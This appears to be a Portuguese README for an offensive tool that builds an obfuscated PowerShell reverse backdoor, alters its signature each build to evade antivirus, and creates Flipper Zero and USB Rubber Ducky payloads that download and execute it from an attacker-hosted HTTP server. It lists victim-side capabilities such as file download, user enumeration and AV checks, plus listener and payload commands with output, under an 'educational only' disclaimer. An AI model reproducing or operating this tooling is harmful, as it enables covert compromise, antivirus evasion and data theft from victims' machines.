
Backdoor reversa escrita em PowerShell e ofuscada com Python. Ela gera payloads para dispositivos populares de hacking como Flipper Zero e Hak5 USB Rubber Ducky, e altera sua assinatura após cada compilação para ajudar a evitar o AV.
/******************************************************************************
* AVISO LEGAL:
*
* Este programa destina-se apenas a fins educacionais. Ao utilizar este programa,
* você concorda que compreende os riscos potenciais associados ao seu uso.
*
* - Este programa não deve ser utilizado em nenhum sistema ou rede sem a devida
* autorização. O uso não autorizado é estritamente proibido.
*
* - O criador deste programa não assume qualquer responsabilidade por danos,
* consequências legais ou perda de dados causados pelo uso deste programa.
*
* - É sua responsabilidade garantir que você cumpre todas as leis e regulamentos
* aplicáveis ao utilizar este programa.
*
* Por favor, use este programa de forma responsável e ética, e respeite a
* privacidade e segurança dos outros.
*****************************************************************************/
# powershell-backdoor
[](https://www.youtube.com/watch?v=C6_6-7b6P3E)
<br>
Ferramenta de backdoor reversa escrita em PowerShell e ofuscada com Python, fornecendo uma nova assinatura após cada compilação para evitar detecção. A ferramenta tem a capacidade de criar payloads para dispositivos de hacking populares, como Flipper Zero e Hak5 USB Rubber Ducky. Use esta ferramenta para testar as defesas do seu sistema contra técnicas avançadas de ataque.
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky] [--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]
Powershell Backdoor Generator
options: -h, --help show this help message and exit --ip-address IP_ADDRESS, -i IP_ADDRESS IP Address to bind the backdoor too (default: 192.168.X.XX) --port PORT, -p PORT Port for the backdoor to connect over (default: 4444) --random, -r Randomizes the outputed backdoor's file name --out OUT, -o OUT Specify the backdoor filename (relative file names) --verbose, -v Show verbose output --delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100) --flipper FLIPPER Payload file for flipper zero (includes EOL conversion) (relative file name) --ducky Creates an inject.bin for the http server --server-port SERVER_PORT Port to run the HTTP server on (--server) (default: 8080) --payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute --list--payloads List all available payloads -k KEYBOARD, --keyboard KEYBOARD Keyboard layout for Bad Usb/Flipper Zero (default: us) -A, --actually-listen Just listen for any backdoor connections -H, --listen-and-host Just listen for any backdoor connections and host the backdoor directory
# Links Rápidos
* [Pré-visualização](#preview)
* [Funcionalidades](#features)
* [Backdoor Padrão](#standard-backdoor)
* [Backdoor Flipper Zero](#flipper-zero-backdoor)
* [Backdoor USB Rubber Ducky](#usb-rubber-ducky-backdoor)
* [Agradecimentos](#thanks)
* [A Fazer](#to-do)
* [Resultado de 5 Ofuscações](#output-of-5-obfuscations)
## Pré-visualização

<br>
## Funcionalidades
* Payload Hak5 Rubber Ducky
* Payload Flipper Zero
* Baixar arquivos do sistema remoto
* Reproduzir arquivos wav de uma URL
* Obter o endereço IP público do computador alvo
* Listar usuários locais
* Encontrar arquivos interessantes
* Coletar informações sobre o sistema operacional do alvo
* Recuperar informações da BIOS do sistema alvo
* Verificar se um software antivírus está instalado e seu estado atual
* Obter clientes TCP ativos
* Instalar Chocolatey, um gerenciador de pacotes popular para Windows (https://chocolatey.org/)
* Verificar se software comum de pentest está instalado no sistema alvo.
## Backdoor padrão
``` bash
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
Um arquivo chamado backdoor.ps1 será criado no diretório de trabalho atual.
Testado no Windows 11, Windows 10 e Kali Linux. Para executar como uma janela oculta e com persistência, siga o guia
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1
Ao usar qualquer um desses ataques, você estará abrindo um servidor HTTP que hospeda o backdoor. Assim que o backdoor for recuperado, o servidor HTTP será encerrado.
Abaixo será gerado um arquivo chamado powershell_backdoor.txt, que quando acionado no Flipper, buscará o backdoor do seu computador via HTTP e o executará.
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
Coloque o arquivo de texto que você especificou (ex: powershell_backdoor.txt) no seu flipper zero. Quando o payload for executado, ele fará o download e executará o backdoor.ps1.
Abaixo está um tutorial sobre como gerar um arquivo inject.bin para o Hak5 USB Rubber Ducky.
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
Um arquivo chamado inject.bin será colocado no seu diretório de trabalho atual. Java é necessário para este recurso. Quando o payload for executado, ele fará o download e executará o backdoor.ps1.
Para codificar payload.txt em inject.bin para ataques USB Rubber Ducky, utilizo o encoder.jar criado por .
Abaixo está o hash sha1 do backdoor.ps1 após 5 compilações.
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49